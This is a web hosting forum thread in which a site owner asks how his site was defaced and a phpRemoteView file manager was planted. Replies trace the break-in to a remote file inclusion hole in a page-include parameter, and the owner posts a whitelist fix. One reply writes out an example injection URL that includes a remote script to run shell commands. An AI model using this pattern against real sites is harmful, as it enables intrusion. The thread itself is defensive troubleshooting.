Web Hosting Talk : Web Hosting Main Forums : Web Hosting : Website hacked, phpremoteview?

[VHockey86]

A few days ago I discovered that my main page had been changed to this:
[my homepage url]
There didnt appear to much of anything destroyed, other than the main page changed, one of the other files had a title changed, and there was a 80k PHP file named prev.php on the server...
I read the description of it and found this site":
[php remote view url]
It appears to be some sort of GUI that shows the whole directory, and allows editing of files and such...

After the first incident, i removed the file, changed all my FTP passwords.

I started looking at server access logs and found POSTs using a "/prev.php" file, which was dated sept 25, although I dont remember ever actually putting any file like that on there. Its rather large at around 88KB. I did a "cat" command via ssh and read the comment at the top, it said something brief about being a php file editing/creating/removing file.

There are repeated POSTs in the log regarding that file, as well as index.htm, all from the same IP at about the time those files are dated.

They look kinda like this:

80.70.227.120 - - [22/Oct/2004:17:56:18 -0400] "POST /prev.php HTTP/1.1" 302 123 [homepageurl] "
[homepageurl]+prev.php?c=e&d=%2Fhomepages%2F22%2Fd107367292%2Fhtdocs%2Fandrew %2F&f=index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)" "-"

I don't really know all that much about web security myself... its hosted by a remote server (1and1.com).

Anyone know how this could have happened? The message on the main page written in illiterate english seems to point to the "?" after the main.php.

The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example
[homepageurl] + main.php?pagename=home.php
Is this somehow exploitable? If so, how can I fix it?

I had to replace the addresses with [homepageurl] ... b/c the board wont let me post links until I have 5 posts apparently

Thanks,
Andrew

[Synaps]

I think that your site got defaced because your host hasnt upgraded their software which had a exploit the cracker used to deface it.
If this continues I suggest that you find another host.
******.com would be a good start in my opinion.

[InsideHosts.com]

Quote:

I think that your site got defaced because your host hasnt upgraded their software which had a exploit the cracker used to deface it.

And what is your evidence here? The poster didn't say what host they were with, or what software the host ran.

Quote:

The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example

This is likely the problem. The attacker will have used ../ or / to escape from the hosted site web directory into other areas, to read other files - for example /etc/password or .htaccess files.

[GideonX]

Quote:

Originally posted by Synaps
I think that your site got defaced because your host hasnt upgraded their software which had a exploit the cracker used to deface it.
If this continues I suggest that you find another host.
******.com would be a good start in my opinion.

Great generalization there

[Synaps]

"And what is your evidence here? The poster didn't say what host they were with, or what software the host ran."

well... the easiest way to deface a website is to exploit it...
doesnt matter which host you are using... it can still be exploited if the software hasent been updated
so it was just my opinion... no need to start flaming.

[InsideHosts.com]

Quote:

doesnt matter which host you are using... it can still be exploited if the software hasent been updated

Well, obviously.

The point is that I'd suggest that posting to say a host is running old software and you move to BlahBlahHost.com as you did is a bit suspect - if you have absolutely no idea whatsoever what software the host is running.

The original poster actually says, in the last paragraph, what the security problem is - it's with their PHP script.

[BigGorilla]

Quote:

Originally posted by VHockey86
The linking system on my webpage is setup so that it passes a "pagename" variable through the url which then opens
for example
[homepageurl] + main.php?pagename=home.php
Is this somehow exploitable? If so, how can I fix it?

That is *very* exploitable. They probably used it to include a PHP injection script that gives them access to a shell. Do a grep on your logs for "cmd=" and you will likely see the abuse. The problem is they can include scripts from other hosts if you allow anything to be defined for the include, such as main.php?pagename=http://www.someothersite.com/cmd.txt?cmd=shell%20commands%20here

You need to prevent them from including just anything for pagename.

There are some things your hosting provider can do to limit the exposure of these kind of hacks, but you still need to lock down your code as well.

[VHockey86]

Alright, thanks for the tip BigGorilla.
So if I was to check the variable against an array of linkable files would that remove the hole?

Something like this?

Code:

$pagename = $_GET['pagename'];
$links = array('home.php', 'file1.php', 'file2.php', 'file3.php', 'file4.php'); // define the array - links
if (isset($pagename)) { // if the $page is set
	if(in_array($pagename,$links)) { // if pagename is in the array
		include($pagename); // include $page
	} // end include page if in array statement
	else { // if $page is NOT in the array
		include('403.htm'); // diaplay a warning
		exit(); // end page running
	}; // end else statement
} // end if page isnt set statement
else { // if $page is NOT set
	include('home.php'); // include default page
}; // end if $page is NOT set statement

[VHockey86]

I've also heard alot of business about "register globals"
How exactly does that work?
Previously I never declared $pagename = $_GET['pagename'] and was told that I should initialize all variables. Is this still a problem?
I was also told to make a php.ini file in the folder and include the line
"register_globals = no"

Thanks for the help guys.
I took down the hacked homepage and stuff... so thats why you probably can't find it (if anyone was looking).

[wpeagle]

I know that this thread is quite old but I got a different problem with PHP RemoteView. It showed in one of my wordpress blog's wp-admin login prompt.

I have a wordpress photography blog which was running well. However, when I was logging in to the wp-admin interface, the login prompt displays PHP RemoteView server prompt and asks for user name and password. MY admin user name and password won't work. I found out that the problem is being served by wp-minify wordpress plugin which I installed one month before. Wp-minify is a wordpress plugin that combines and compress JS and CSS files to improve page load time.

I tried to search Google for the problem but there is no information posted yet. I deactivated all plugins that I recently installed and re-activated the plugins one by one and found out that wp-minify is the culprit when it is activate.

[doug123w]

I just encountered the same problem with WP-minify and phpRemoteView. I can't see what set it off exactly and don't appreciate the passing panic that the site had been hacked (Google did at least inform me that phpRemoteView is sometimes injected to do just that). Maybe my reply will strengthen Google's attraction to the topic.

I deleted WP-minify, which has worked fine for a long time, and I suspect would work if reinstalled. However for now I am trying out the derivative Better WordPress Minify ("Allows you to minify your CSS and JS files for faster page loading for visitors. This plugin uses the PHP library Minify and relies on WordPress's enqueueing system rather than the output buffer (will not break your website in most cases). This plugin is very customizable and easy to use.")

I wish I'd found your post or thought of this before contacting greengeeks tech support, though they were quick to help. BTW you can reduce the pain of finding the guilty plugin by activating half, checking for error, then activating (or deactivating if the problem returned) half of that, etc. One of the few things I remember from CS, the binary search.

-- Andrew